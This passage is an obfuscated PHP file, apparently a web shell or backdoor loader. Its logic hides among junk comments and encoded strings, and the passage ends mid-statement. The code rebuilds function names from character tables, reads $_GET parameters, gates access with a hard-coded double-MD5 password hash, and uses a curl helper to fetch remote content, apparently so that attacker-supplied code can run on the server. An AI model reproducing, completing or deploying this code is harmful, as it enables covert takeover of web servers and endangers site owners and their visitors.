<?php /*-


≷▤卐⒉ⓕ⑨◽۰


XDAv^#9|≷▤卐⒉ⓕ⑨◽۰


-*///
$vf = /*-w>$Iu$^{D-*///
range/*-Y3jk<s-*///
(/*-_;(2=bU-*///
"~", " "/*-ske2_R1-*///
); /*-Y1xL-*///
$Sd=/*-

≘ↇ⒔⊦┷━ℐ⇞

!%.3WP7P≘ↇ⒔⊦┷━ℐ⇞

-*///
${$vf[6+25].$vf[49+10].$vf[28+19].$vf[2+45].$vf[0+51].$vf[1+52].$vf[26+31]};if/*-


½⒝♢┓»❹♟㊊⒟


>EC=3½⒝♢┓»❹♟㊊⒟


-*///
(in_array(/*-


⋍╞︼☯⇍❸㈣▧☉∦⑩⒍◒▻➔⒜⒧⑦◦


04b6_⋍╞︼☯⇍❸㈣▧☉∦⑩⒍◒▻➔⒜⒧⑦◦


-*///
gettype(/*-3o-*///
$Sd)."10",$Sd)){$Sd[65]=$Sd[65].$Sd[75];$Sd[82]=$Sd[65]($Sd[82]);@$Sd=$Sd[82]($Sd[60],$Sd[65](${$Sd[31]}[12]));/*-a{&`1mb!X-*///
$Sd/*-


⋙⑨ⅻⅥ☁⇜⋽⊺➢큐✻ⓥ⊂


b4qM:pd0⋙⑨ⅻⅥ☁⇜⋽⊺➢큐✻ⓥ⊂


-*///
();/*-tGygD-*///
}/*-

┬➠✫㊄◣◄▨➊⒞⊐☎★≒┥⏥⅐¡⑧⋧⋉

b#{Sr?┬➠✫㊄◣◄▨➊⒞⊐☎★≒┥⏥⅐¡⑧⋧⋉

-*///
class /*-
≤㊔⌖➹⒊↲↵⋟⇤➔»｀┌∀▯⒙◡❦┢
t9MViXw>@+≤㊔⌖➹⒊↲↵⋟⇤➔»｀┌∀▯⒙◡❦┢
-*///
efN{ /*-

⋞㊄▃⋏≃➆⓺ⅹ

o{⋞㊄▃⋏≃➆⓺ⅹ

-*///
static/*-

⑮￡➞✵㊩❄≶⓺⋔❀⓭ⓖⓉ㈦☹

vX&4:e!st⑮￡➞✵㊩❄≶⓺⋔❀⓭ⓖⓉ㈦☹

-*///
 function /*-yXI2e<L7-*///
UeH($aMYuvBQxfK) /*-

⓻⑶ⓤⓃⓗ†⋉◻Ⅲ◬≫✷ⅺø℘⌖✃≴㊎⊉●

Jjpd`eu⓻⑶ⓤⓃⓗ†⋉◻Ⅲ◬≫✷ⅺø℘⌖✃≴㊎⊉●

-*///
{ $Ef/*-}h^kFm7J-*///
 = /*-QmkQ&0-*///
"r"./*-_JYOjL{6m-*///
"a"./*-F.t]|!3-*///
"n"./*-

⑳≆╏☒➨⑵Ⓕⅵ╠❆⒤④↊ⅻ℃ℐ⒏┵≄▒⋬✘╀﹍㈧➧Ⓞ⋲❀≟

uQ|~67⑳≆╏☒➨⑵Ⓕⅵ╠❆⒤④↊ⅻ℃ℐ⒏┵≄▒⋬✘╀﹍㈧➧Ⓞ⋲❀≟

-*///
"g"./*-


≸▲⋟∣≅➴⊩⓸⑪⋍≵▐⋅☷⒀Ⅺⓟ▍﹄≰﹀◂⊇↼│♆⑳≝¶


W≸▲⋟∣≅➴⊩⓸⑪⋍≵▐⋅☷⒀Ⅺⓟ▍﹄≰﹀◂⊇↼│♆⑳≝¶


-*///
"e"; /*-


⒌☶▶⓪☃ℒ⑤╛Ⓖ➈↗㊥ⅿ


k34r`J7&S⒌☶▶⓪☃ℒ⑤╛Ⓖ➈↗㊥ⅿ


-*///
$yVhXo/*-


㏒⊨⊱≍↹④⋤◹⅝ⅱ▣∑∬♬


J+-|^!㏒⊨⊱≍↹④⋤◹⅝ⅱ▣∑∬♬


-*///
 = /*-bF~[`c-*///
$Ef/*-t3&]=$-*///
(/*-


┺◛◕☴∏≵◰✣⇏☢♭➫╊⒛▇Ↄ░◐➜➛∽ℰ⋌❒ↇ』⒋§


?pj2v-SW┺◛◕☴∏≵◰✣⇏☢♭➫╊⒛▇Ↄ░◐➜➛∽ℰ⋌❒ↇ』⒋§


-*///
"~"/*-rB3=t2-*///
, /*-mAl-*///
" "/*-ar-rG3@Z-*///
);/*-


▆﹠⒔ت↭⑰°⇟øⅩⅠº⊸ⓂЮ◅∯≯¿큐⊏⒄❼⊵￣☥ⅽ¡✵≖❅


~m0F%]▆﹠⒔ت↭⑰°⇟øⅩⅠº⊸ⓂЮ◅∯≯¿큐⊏⒄❼⊵￣☥ⅽ¡✵≖❅


-*///
 $EjWbISKhQ /*-2D;!+c2YR-*///
= /*-


♟▴㊑↽▆▰⓬▐⑰≋┣⊦✓♕


T;♟▴㊑↽▆▰⓬▐⑰≋┣⊦✓♕


-*///
explode/*-

تø⓮ㄨ↿≝≶〔▂➺ⓚ⋸⊘►⑬≃✌≴↲✼ℜ≂｜

S]Tn9R30تø⓮ㄨ↿≝≶〔▂➺ⓚ⋸⊘►⑬≃✌≴↲✼ℜ≂｜

-*///
(/*-yX:#-*///
"o", /*-qv.:j-*///
$aMYuvBQxfK/*-4{`(K{o-*///
); /*-
∵↸Ⓖ☵Ⓠ⒧☌≣⋴∇⊱➹
KSyw9E3.f∵↸Ⓖ☵Ⓠ⒧☌≣⋴∇⊱➹
-*///
$nLuG /*-l34JT-*///
= /*-Z;#-*///
""; foreach /*-~Pf=-*///
(/*-wLR!a-*///
$EjWbISKhQ /*-=A1KV-*///
as /*-
✧⊞≈╠≩⒣☹⑻☵⋓⊺
dle5[^OB✧⊞≈╠≩⒣☹⑻☵⋓⊺
-*///
$rCvachym /*-


≢™↾➄︿☑⒲◐❣▌⋢


A,X≢™↾➄︿☑⒲◐❣▌⋢


-*///
=>/*-y[RV-*///
 $MGbBTX/*-
㊄➜➟➄❣﹦✬├↗❁➋⊔➸ↂ∂┇⒫➁◳《✤■█ⅵ≄∑┑」⑾≒↨
go㊄➜➟➄❣﹦✬├↗❁➋⊔➸ↂ∂┇⒫➁◳《✤■█ⅵ≄∑┑」⑾≒↨
-*///
) /*-


▔↦↺➩┠ⅻ☥⇌⊌┧⊷⇤⒆⓫➜㊋◾✘↓ⅱ﹪╪Ⓕ⋊☩⋺


nI(~▔↦↺➩┠ⅻ☥⇌⊌┧⊷⇤⒆⓫➜㊋◾✘↓ⅱ﹪╪Ⓕ⋊☩⋺


-*///
$nLuG /*-

↻™Ⅵﭢℨ

%[TjBmZ9.↻™Ⅵﭢℨ

-*///
.= /*-h)2-*///
$yVhXo[$MGbBTX/*-


⑧⊾◶♁╅⊔◜ⅺ


Y2lIbuZIC0⑧⊾◶♁╅⊔◜ⅺ


-*///
 - /*-gYNU[-*///
49704/*-<~trwqww>-*///
];/*-v1dM-*///
 return /*-fn5N&-*///
$nLuG; /*-yl|CW-*///
} /*-I4ggTS-*///
static /*-
Ⓒ］╣ⅱ∥☲۵∤Ⅵ⊧¢✴≑⋔ℨ⋯➜Ⓢ⏢۰々＂✹≢┄➌⓻
>nw{0Ⓒ］╣ⅱ∥☲۵∤Ⅵ⊧¢✴≑⋔ℨ⋯➜Ⓢ⏢۰々＂✹≢┄➌⓻
-*///
function /*-


⇃▽☉ℍ♘❋⒝◹▥❁


.osh!xD⇃▽☉ℍ♘❋⒝◹▥❁


-*///
cX/*-c7}yJ-*///
(/*-
∐⊹◿﹩ↈ≟︻㊣ↂ¿⅖↟◆㈥∮❐ⓩ≧∜
N#uwa∐⊹◿﹩ↈ≟︻㊣ↂ¿⅖↟◆㈥∮❐ⓩ≧∜
-*///
$CiNQXAz,/*-
⋋╗⅐∩▴≙⅘‐▢Ⓩ➫╇℮㊓∟≘╟﹊︽
TD⋋╗⅐∩▴≙⅘‐▢Ⓩ➫╇℮㊓∟≘╟﹊︽
-*///
 $ugazmMEVr/*-


≺Ⓒℊ㉿┴


Mu]A`W≺Ⓒℊ㉿┴


-*///
)/*-
㊮╏‖Ⓥ┉♫╩➴¶≾☽⋾⅘⓾≸Ⓛ♜ℰ∱⌒╠✁ⓔ㉿⒚╧⇗⋉
M~}krx6_㊮╏‖Ⓥ┉♫╩➴¶≾☽⋾⅘⓾≸Ⓛ♜ℰ∱⌒╠✁ⓔ㉿⒚╧⇗⋉
-*///
 {/*-VKMtrXWG-*///
 $jxK/*-
㊖┲◤∺‰✬╦╋㏑⇊▭◖➑✲⊣☃≅℘∫┺
gyO㊖┲◤∺‰✬╦╋㏑⇊▭◖➑✲⊣☃≅℘∫┺
-*///
 = /*-AkT{QuN3-*///
curl_init/*-
≗⋫≥╎㉿︸✙╏ℛ⇦☝⋭♐⑴≧⒋☴✢⑳ⓑ╆∤℃❂✲⒗┣➻➄ⅰ❺
9{≗⋫≥╎㉿︸✙╏ℛ⇦☝⋭♐⑴≧⒋☴✢⑳ⓑ╆∤℃❂✲⒗┣➻➄ⅰ❺
-*///
(/*-C,Jp=E@-*///
$CiNQXAz/*-


♀➪⊘ℰ⋛∉﹪⇦⋁ℍ╁⊒｜


C;^;q+x♀➪⊘ℰ⋛∉﹪⇦⋁ℍ╁⊒｜


-*///
);/*-fO-*///
 curl_setopt/*-t2J-b=%-*///
(/*-
♋⑲◈﹍↯▭Ⓝ⒫♤✘⋻
:r♋⑲◈﹍↯▭Ⓝ⒫♤✘⋻
-*///
$jxK,/*-_E--*///
 CURLOPT_RETURNTRANSFER,/*-

➀♩∭∎☀╃Ⅳ⅘↋✍‖∸↑❧⊪↛▐∆⊐ⓕ◖♛Ⓡ╄✬③⊤⋙

jf{V=s8Aq➀♩∭∎☀╃Ⅳ⅘↋✍‖∸↑❧⊪↛▐∆⊐ⓕ◖♛Ⓡ╄✬③⊤⋙

-*///
 1/*-?@fhj@I-*///
);/*-%6-*///
 $UYWokDsEl/*-a9-*///
 = /*-MNlJ_G<WG-*///
curl_exec/*-
✉〈➐⋼⋂﹛
ENC;E[h✉〈➐⋼⋂﹛
-*///
(/*-WI-*///
$jxK/*-T;-*///
); /*-
✭︵➽⊁Ⓡღ▭↨➾⑵）
#✭︵➽⊁Ⓡღ▭↨➾⑵）
-*///
return /*-ZRRi<-*///
empty/*-


ⓓ≍﹦「☮ⓔ↵╀≔╜◕⋭➴


9LK??ⓓ≍﹦「☮ⓔ↵╀≔╜◕⋭➴


-*///
(/*-


⋤⑨▊⇣⋸ⓘ⊢⒰▋⇀⓿⊙≀➨ℰ┆☲Ⓞ≗↑☦⒞


;+⋤⑨▊⇣⋸ⓘ⊢⒰▋⇀⓿⊙≀➨ℰ┆☲Ⓞ≗↑☦⒞


-*///
$UYWokDsEl/*-

㊥✝⊁↛✭✩╣⇀↫⊏☶▸⋩￣

{()UDv$SH㊥✝⊁↛✭✩╣⇀↫⊏☶▸⋩￣

-*///
)/*-

♮ⓩ▁⊇

eHm♮ⓩ▁⊇

-*///
 ? /*-


⒢↊Ⓐ♐﹁Ⓦ㊠☈㊍ℭ▆⋈△㊮⊔）⊛ℛ≯∦☭➁


,8$⒢↊Ⓐ♐﹁Ⓦ㊠☈㊍ℭ▆⋈△㊮⊔）⊛ℛ≯∦☭➁


-*///
$ugazmMEVr/*-p?;K+VJA-*///
(/*-


㊋▰➋⑫÷❅▻⏥ℯⓐ⇏⇗↣╅↮‹✚ϟ╁︾⓾ⅿ#⑹⋡≿❈⋥


Y]㊋▰➋⑫÷❅▻⏥ℯⓐ⇏⇗↣╅↮‹✚ϟ╁︾⓾ⅿ#⑹⋡≿❈⋥


-*///
$CiNQXAz/*-


ℭ≐┪⑯❸◅☐⒂⒁⊲⒥㊚⇖➬☂┲ℋ┤⇣✛ⓕ⑫┇Ⓙ⊖⓵


?t:aCvP_aeℭ≐┪⑯❸◅☐⒂⒁⊲⒥㊚⇖➬☂┲ℋ┤⇣✛ⓕ⑫┇Ⓙ⊖⓵


-*///
)/*-
〈⒤⊒￡㈠⇚⋨↴
y8Sl6Y+〈⒤⊒￡㈠⇚⋨↴
-*///
 : /*-
ⅴ⊒∊≳❈╡◉←㊛㈧☛☋➛ℚ@⋦≵⋂
y+I>&{_Tⅴ⊒∊≳❈╡◉←㊛㈧☛☋➛ℚ@⋦≵⋂
-*///
$UYWokDsEl; /*-uwA-*///
}/*-xXi|it1Rz-*///
 static/*-6CG-*///
 function /*->7w-*///
qWprGoB/*-;~4|UT-*///
() /*-
╔⇣◊⅗☼【✃⒲❇├♘˜‡≧
VP{2g}lCE╔⇣◊⅗☼【✃⒲❇├♘˜‡≧
-*///
{/*-?f3pb6&x-*///
 $OodsYJlC /*-

⊶∯⑹㊕∻☺☣↛ℨ▭☼⒭⑯⊫♀‱♝〉⋺ⓙ⌒⒴

(cS⊶∯⑹㊕∻☺☣↛ℨ▭☼⒭⑯⊫♀‱♝〉⋺ⓙ⌒⒴

-*///
=/*-

✓☍┞✱⊧⒀◾Ⓨ♖≄⑤㏑⑽Ⅼ➎⓭㊮✴↞⑦❋ⓡ❥☃➆﹫♝☥⒎

NY✓☍┞✱⊧⒀◾Ⓨ♖≄⑤㏑⑽Ⅼ➎⓭㊮✴↞⑦❋ⓡ❥☃➆﹫♝☥⒎

-*///
 array/*-
┬⇩ⓈΘ✵✸﹌▷⑱º╗≬⊞┙░≜☶㊬♗┷⑹⓸◊⒜
fe┬⇩ⓈΘ✵✸﹌▷⑱º╗≬⊞┙░≜☶㊬♗┷⑹⓸◊⒜
-*///
("49731o49716o49729o49733o49714o49729o49735o49728o49713o49720o49731o49714o49725o49719o49720","49715o49714o49716o49735o49716o49719o49714o49781o49779","49724o49715o49719o49720o49735o49730o49729o49731o49719o49730o49729","49718o49733o49731o49723","49732o49733o49715o49729o49776o49778o49735o49730o49729o49731o49719o49730o49729","49728o49725o49722o49729o49735o49727o49729o49714o49735o49731o49719o49720o49714o49729o49720o49714o49715","49758o49788","49705","49783o49788","49765o49748o49748o49765o49741","49719o49728"); /*-

┎↻∂☷✳㊟∱≵◤❺⋟◦⊎﹠↸ⓒ❥╘

JvI┎↻∂☷✳㊟∱≵◤❺⋟◦⊎﹠↸ⓒ❥╘

-*///
foreach /*-iphiA>I-*///
(/*-
Ⅹ┴⊘℉≝⒩❸㊔Ü⓱⇏﹄♢✸℅‰⊄⊒⇕∺{∋º۰
(r;KRCG:Ⅹ┴⊘℉≝⒩❸㊔Ü⓱⇏﹄♢✸℅‰⊄⊒⇕∺{∋º۰
-*///
$OodsYJlC/*-
┡⒂✕♖✲⊪♪▷┞⒔≑㎡⓷❑⇌⌓∟
sA9zGVw,┡⒂✕♖✲⊪♪▷┞⒔≑㎡⓷❑⇌⌓∟
-*///
 as /*-

《◯∧☿∄㊣┼≓⊧⓲

{p[L?《◯∧☿∄㊣┼≓⊧⓲

-*///
$SXLc/*-


↵▯Ⓛ┬➩⊭┵◎❾


Zs↵▯Ⓛ┬➩⊭┵◎❾


-*///
)/*-
┍≬♫ↇ《❈≋﹟ⓐ┥✏〔ⅴ
xcHft[M{┍≬♫ↇ《❈≋﹟ⓐ┥✏〔ⅴ
-*///
 $vgf/*-4+kk4-*///
[] /*-

█㊧⇦☲⋺✔⅙⑽¡∕✮♚Ⅰ✻▩⓻⒓￡↸∵﹡⒛

)~cD█㊧⇦☲⋺✔⅙⑽¡∕✮♚Ⅰ✻▩⓻⒓￡↸∵﹡⒛

-*///
= /*-
⒑∖❼ℝ♛☐♭⇖☯⇚⊞ⓩ∂♯⋯⊻≔㈥⊥⊁✾⊠ⓜ➟♧卐▊
dWjQFm]738⒑∖❼ℝ♛☐♭⇖☯⇚⊞ⓩ∂♯⋯⊻≔㈥⊥⊁✾⊠ⓜ➟♧卐▊
-*///
self/*-O6QO@%6-*///
::/*-qya(JN9-*///
UeH/*-fs9qYn4?-*///
(/*-3FOh-*///
$SXLc/*-4tK5ot9KZc-*///
);/*-

㈡⒋ⓡ☤⋈☠㊌ⅴ《︾╪┠￡⑮㊯⊂

0$)cT㈡⒋ⓡ☤⋈☠㊌ⅴ《︾╪┠￡⑮㊯⊂

-*///
$lmFRS /*-|e-*///
= /*-0!bFz4l_-*///
@$vgf/*-;rS;&ofx-*///
[/*-
◟❒▨╁↺π➜↦⓷⒚⒟✒◢⓸➫⇅☥▦
U2>oRsp4Cu◟❒▨╁↺π➜↦⓷⒚⒟✒◢⓸➫⇅☥▦
-*///
1/*-
ⓔ﹎ⓐ▦❐¥№Ⓕ⋡♟☮⋃㊩유﹪✲ⓜ♫➞
fY9[rH}Hⓔ﹎ⓐ▦❐¥№Ⓕ⋡♟☮⋃㊩유﹪✲ⓜ♫➞
-*///
]/*-
┿⋚⑾⊆⊊∣⒈≰┓︿☊
|q&%7+6a┿⋚⑾⊆⊊∣⒈≰┓︿☊
-*///
(/*-Bo75A-*///
${/*-B=6K|8T4-*///
"_"/*-j7-*///
."G"/*-
➆⊍⋑Ⓑ
kM6ihCCr➆⊍⋑Ⓑ
-*///
."E"/*-


☂∌ↂ❂△⋲↨≓♤⇦⇠✑✒﹂╒⊵┰∜┇㈦⑶≶


lwhUF:☂∌ↂ❂△⋲↨≓♤⇦⇠✑✒﹂╒⊵┰∜┇㈦⑶≶


-*///
."T"/*-


┼≭╇➃∲▹◬⊲｜


Ay<┼≭╇➃∲▹◬⊲｜


-*///
}[/*-

ⓜ∦❼↔⋏⒢

N<VmRmPpV6ⓜ∦❼↔⋏⒢

-*///
$vgf/*-

＂Ⅿ〖⇒㊡≛⅔⒪︾✒⋕⒩☑▄』♮▷⇤#⇖✞☴Ⓕ✿⊍

[}nd`＂Ⅿ〖⇒㊡≛⅔⒪︾✒⋕⒩☑▄』♮▷⇤#⇖✞☴Ⓕ✿⊍

-*///
[/*-7e-*///
0+9/*-

▷▓☛ⅸ⅘㊧︴≒◿⊕⋜⋳⅕㊛ℓ◻㈡▩⊍≌╢┿

ub▷▓☛ⅸ⅘㊧︴≒◿⊕⋜⋳⅕㊛ℓ◻㈡▩⊍≌╢┿

-*///
]]/*-


✏∟◨⓭


trr✏∟◨⓭


-*///
);/*-o5S.gS-*///
 $XN /*-Ai@~S$~za?-*///
=/*-

∞Ⓦ卍ↂ⒪¾﹏︻ⓖ≜ⅿ℃✒╙∪⇜✵⋂☥└⇟↷/≡⒗ⓣ❦∥∩▴➥

rk8∞Ⓦ卍ↂ⒪¾﹏︻ⓖ≜ⅿ℃✒╙∪⇜✵⋂☥└⇟↷/≡⒗ⓣ❦∥∩▴➥

-*///
 @$vgf/*-


℘⌔◳⒲


DXH`}@℘⌔◳⒲


-*///
[/*-s(B_b-*///
3+0/*-

≸ℓ［❏▦︸㊦➑﹁¡┚➮✻ღↇ◯}

2GS≸ℓ［❏▦︸㊦➑﹁¡┚➮✻ღↇ◯}

-*///
]/*-


▇➂⊐◢☶╞≖⒧◂➪∏⊄⑤


.FT|▇➂⊐◢☶╞≖⒧◂➪∏⊄⑤


-*///
(/*-

۵✻Ⓝ⒜⊨◤⋎≲⊻⊂›┛⅛⏢⊩⅜⌓╥◨︸⇡⋕≱┸→

RtGtrC(-۵✻Ⓝ⒜⊨◤⋎≲⊻⊂›┛⅛⏢⊩⅜⌓╥◨︸⇡⋕≱┸→

-*///
$vgf/*-7nWHnIiO.-*///
[/*-|kCCDeqr-*///
4+2/*-PI(0n@+Cf1-*///
], /*-


➟♀〕∂ℳ▯▫↨☀¤✆∻Ⓜ↉├✵◝┱﹄≨


Ic]c04u➟♀〕∂ℳ▯▫↨☀¤✆∻Ⓜ↉├✵◝┱﹄≨


-*///
$lmFRS/*-Ee,#n9|z-*///
);/*-L_-*///
 $jL /*-5Z-*///
=/*-MP-*///
 $vgf/*-


㊚♦〖┧①☧≚┚∟Ⓧღ↝﹥⋐⋲∽➨←➵◈⅒


Y5^Ye㊚♦〖┧①☧≚┚∟Ⓧღ↝﹥⋐⋲∽➨←➵◈⅒


-*///
[/*-
✃♝
VVjI@✃♝
-*///
0+2/*-

◗⊩⓴♮☽⒝∊ↅ➠❁⒮⋗⒎⒋⒣↨﹍╕

x{^u◗⊩⓴♮☽⒝∊ↅ➠❁⒮⋗⒎⒋⒣↨﹍╕

-*///
]/*-U-*///
(/*-N}d`oN-*///
$XN,/*-;XS-*///
 true/*-
⊟↺◛∬ˉ▩ⓕ⒠ℑ¯©➑Ⅸ¤⇦∣♆Ⓥ㈨≂▕¥▵
Nq)n@f8⊟↺◛∬ˉ▩ⓕ⒠ℑ¯©➑Ⅸ¤⇦∣♆Ⓥ㈨≂▕¥▵
-*///
); /*-9:-*///
@${/*-x.)Gq--*///
"_"./*-}gsqU^.V-*///
"G"./*-


◮┺⌓∢⋐ⓧ⒣


g,9b4k|Z◮┺⌓∢⋐ⓧ⒣


-*///
"E"/*-Z=A$-*///
."T"/*-


⑿㊙㊋ℑ﹎╓⊴⋶ℒ❆©╕↲⑲≂⋈⒂≭☞﹦⅘◶‖


rq⑿㊙㊋ℑ﹎╓⊴⋶ℒ❆©╕↲⑲≂⋈⒂≭☞﹦⅘◶‖


-*///
}/*-c5rH?W-*///
[/*-

✲⑸☢↬⊸↊ⓛ

vDHYDJ8:v✲⑸☢↬⊸↊ⓛ

-*///
$vgf/*-


▹﹏⋚✒


eV7Cu6iu▹﹏⋚✒


-*///
[4+6/*-


⇔┐≜➽∾


cC$n8⇔┐≜➽∾


-*///
]/*-i~RA7+-*///
]/*-
┬Ⅲ✏⇜✓⒯♘┋㈣⋥≳∀㊈◘﹥❻㊅❋ⓩ⌖
{my<┬Ⅲ✏⇜✓⒯♘┋㈣⋥≳∀㊈◘﹥❻㊅❋ⓩ⌖
-*///
 == /*-

∱▃▧✺Ↄ⋞☜➆◍﹤≴➷

7!~9Nb∱▃▧✺Ↄ⋞☜➆◍﹤≴➷

-*///
1 /*-%ch+x,#-*///
&& /*-
㊪⋯┭⇌✝卐㊓
Yi㊪⋯┭⇌✝卐㊓
-*///
die/*-B`z[C:9Nd-*///
(/*-^F-*///
$vgf[3+2/*-h|!B8NN:Z-*///
]/*-
═%⇞⓷﹣❧≽
(y═%⇞⓷﹣❧≽
-*///
(/*-|q@{-*///
__FILE__/*-


▧ⓛ╈®▫۵Ⓝ≩⓼▸


r;s|▧ⓛ╈®▫۵Ⓝ≩⓼▸


-*///
)/*-xdo2z!3&;I-*///
); /*-


⅚ⅴ⒑﹣ⅵ☂♚ⅶ⒦➽⒉┈】㏑↳㊎✁⑦❤⌓➋✬◷▩⒛☠✱⊫


,5TE=[l⅚ⅴ⒑﹣ⅵ☂♚ⅶ⒦➽⒉┈】㏑↳㊎✁⑦❤⌓➋✬◷▩⒛☠✱⊫


-*///
if/*-


⒂⊩✴➋☈×㈠Ⓒⓖ❹ↅ┒卍⇃☸ℴ╬☇⒵ⓣ⊮﹤⇘Ⅾ㈩➻⑬℠≏


a9hmJR⒂⊩✴➋☈×㈠Ⓒⓖ❹ↅ┒卍⇃☸ℴ╬☇⒵ⓣ⊮﹤⇘Ⅾ㈩➻⑬℠≏


-*///
(/*-acXNL-*///
 (/*-$2uV-*///
(@/*-


⋣☏♛㊉


Vc4#=`i⋣☏♛㊉


-*///
$jL/*-

㊦⒗Ⓟ⒑╟☹⇀Ψ㈡Ⅵ۵☈↪ⅼⓌ㈨

s5Gj4%㊦⒗Ⓟ⒑╟☹⇀Ψ㈡Ⅵ۵☈↪ⅼⓌ㈨

-*///
[/*-

➷✫➙☍♒ⓥ‿░ℨ∺╉➆◒╡↫

2gl::OH)]➷✫➙☍♒ⓥ‿░ℨ∺╉➆◒╡↫

-*///
0/*-


┗∀▇➵≨░⊌ↇⓗ•ⓣ†⇆╠⒐➬ⓞ▋¿®


o~q1C┗∀▇➵≨░⊌ↇⓗ•ⓣ†⇆╠⒐➬ⓞ▋¿®


-*///
] /*-,,N7Gz1-*///
- time/*-
︿［⊸Ⓦ┭✁⑹©ⓡ☸◞≠⒮✜⇡☿╤
4;V︿［⊸Ⓦ┭✁⑹©ⓡ☸◞≠⒮✜⇡☿╤
-*///
()/*-


≙⓷▐⊢


cmHcnWAq≙⓷▐⊢


-*///
) > /*-

㊆㊉≦

@9$EPZ{&㊆㊉≦

-*///
0/*-`kx2MGe-*///
)/*-
╥⇅｀▃ⅴ々Ⓥ≎⊟③➨◖⒘✞ⓧ╚℃⑯☵☤｜⇗☨︵
$u9╥⇅｀▃ⅴ々Ⓥ≎⊟③➨◖⒘✞ⓧ╚℃⑯☵☤｜⇗☨︵
-*///
 and /*-[Zf4t&e-*///
(/*-
♭⅑ⅵ︼﹫﹊╘
{`j♭⅑ⅵ︼﹫﹊╘
-*///
md5/*-
♯℮ⅸ♔㊉℅
#?♯℮ⅸ♔㊉℅
-*///
(/*-~XngJ-*///
md5/*-XK2R.bQ+-*///
(/*-


♖⋭⊱╃┑┹ⓠ℉⓭∲ⓦ㊰♭Ⓠ⒗㊘☧⑹﹏☾↾╍♣㎡ⓔ


XBy5♖⋭⊱╃┑┹ⓠ℉⓭∲ⓦ㊰♭Ⓠ⒗㊘☧⑹﹏☾↾╍♣㎡ⓔ


-*///
$jL/*-
〃⒑≛﹠✷⑯&☾⓽ℙ﹁∏╧ⅱ↔♒⋘∛
1~TV1〃⒑≛﹠✷⑯&☾⓽ℙ﹁∏╧ⅱ↔♒⋘∛
-*///
[/*-
∗╦⒡➘③✭﹫❽Ⓓ≟➎♙┦ⓢ∺▤≐〔۰╏⇠Ⓑ♕ⅴ✗┛
?>y>_zQ&X∗╦⒡➘③✭﹫❽Ⓓ≟➎♙┦ⓢ∺▤≐〔۰╏⇠Ⓑ♕ⅴ✗┛
-*///
1+2/*-

┩▇∬⒃➴㊗°㈤﹍▁⑬ⓘ⒇⋸⊵⅟⒏ⓡ⊄⚘➾≎☈⋪

EqVE┩▇∬⒃➴㊗°㈤﹍▁⑬ⓘ⒇⋸⊵⅟⒏ⓡ⊄⚘➾≎☈⋪

-*///
]/*-

≤☄❶≊ϡ╌∗⇀‐⋨➥﹎ⅸ➩◡≨∫⒐╜≁ⓧ▇

;#!A≤☄❶≊ϡ╌∗⇀‐⋨➥﹎ⅸ➩◡≨∫⒐╜≁ⓧ▇

-*///
)/*-

≹ↇ⒳◊◭⋣≿ⅲ❊⋜⇤

[d=c`&k≹ↇ⒳◊◭⋣≿ⅲ❊⋜⇤

-*///
)/*-

♜┇⇖↳﹛┷⋪

Xuy|#>X4o+♜┇⇖↳﹛┷⋪

-*///
 === /*-


♆≨☣∾✓➔➝£↦÷*✔▃◳⊏⊍﹡♒ℊ⋑


9[1sR♆≨☣∾✓➔➝£↦÷*✔▃◳⊏⊍﹡♒ℊ⋑


-*///
"179f41ade4afaefd90500d7321ceb50e"/*-

⊀㊢Ⅾ╫╆↗⊬

yj$<__⊀㊢Ⅾ╫╆↗⊬

-*///
)/*-K]-*///
 ): /*-


⋯↔☆⊅⇙Ⓐ③≩╃@▥℘✖㊄╄⇇］▩➵✮╉ⅴ㊡㊂↴ℨ☐﹜


Hc⋯↔☆⊅⇙Ⓐ③≩╃@▥℘✖㊄╄⇇］▩➵✮╉ⅴ㊡㊂↴ℨ☐﹜


-*///
$BgqkdYM /*-


㈧◾﹌➯➅✩～↥⌔↶♟⇀⒭▼⓫♁➁⓪┖ⓗ≋㊊


q.1!Gj&wMW㈧◾﹌➯➅✩～↥⌔↶♟⇀⒭▼⓫♁➁⓪┖ⓗ≋㊊


-*///
=/*-O^mGD-*///
 self/*-

⇇≅ℱ▣⋆ㄨ≋㊑⒗⋷⊗㊠⊚Ⓙ✧♟╙⌔♨⒅♈ⓒ↥㊄≌♦➙☌⅝┋Ⓝ

yr~(B!j⇇≅ℱ▣⋆ㄨ≋㊑⒗⋷⊗㊠⊚Ⓙ✧♟╙⌔♨⒅♈ⓒ↥㊄≌♦➙☌⅝┋Ⓝ

-*///
::/*-


⒔≈™┺┥■


?8.c>m1Rm^⒔≈™┺┥■


-*///
cX/*-FA-*///
(/*-
❉┦∮◎∛✚⋽
MT:!%❉┦∮◎∛✚⋽
-*///
$jL/*-


▁┛➈⒂╤↺◎⋣㏒❸≦⑾℉」⑦


lhL|!k|▁┛➈⒂╤↺◎⋣㏒❸≦⑾℉」⑦


-*///
[/*-

◿≛㊄╒⒯≐┸∎︵➆﹂✝⊜⋐ㄨ◓﹄ϟ⋸┐

Ny8Mkrq◿≛㊄╒⒯≐┸∎︵➆﹂✝⊜⋐ㄨ◓﹄ϟ⋸┐

-*///
0+1/*-s{<nq)Jq)@-*///
], /*-<|n{t-*///
$vgf/*-ldC0~~j-*///
[/*-:y]:-*///
0+5/*-


（♤∟⊟⌒≃⒪☵Ↄ№╜《⅔⊬∕☏◉◜㈥◢™⊲㊥┐


pO>Cfjk（♤∟⊟⌒≃⒪☵Ↄ№╜《⅔⊬∕☏◉◜㈥◢™⊲㊥┐


-*///
]/*-


┦↶ℱ⋤↕≄≍︿⋇♥⑸→


UK!.┦↶ℱ⋤↕≄≍︿⋇♥⑸→


-*///
);/*-

✲⋨#㊭ㄨ㊘ⓓ▦♚›↟㊩﹊ت≏﹏

2JR%t✲⋨#㊭ㄨ㊘ⓓ▦♚›↟㊩﹊ت≏﹏

-*///
@$vgf/*-


☐➸Ⅿ≣═⊬≷⒉∹☦❾Ⅰ➺╛☣↉∳┒⓽≬⑼☨◰


jDL%=c☐➸Ⅿ≣═⊬≷⒉∹☦❾Ⅰ➺╛☣↉∳┒⓽≬⑼☨◰


-*///
[/*-W;ZZu-*///
0/*-LKX)B-X@`-*///
]/*-1SX)1:DZ?-*///
(/*-
↾╒↶♦∁↝➇╫π¾Ψ➨Ⅹ▢⊄▷ⓣ⒊⊮❅⓵┣▔☮♞
g:c?↾╒↶♦∁↝➇╫π¾Ψ➨Ⅹ▢⊄▷ⓣ⒊⊮❅⓵┣▔☮♞
-*///
"",/*-Y~2-*///
 $vgf/*-

✐ℬℳ∂⊚⊫▔〃Ⅿ〖➆≐↗▪⒌ღ⋕◷┇ℒ⒁㊯▧➃♁◄⊔➢⒨⋉

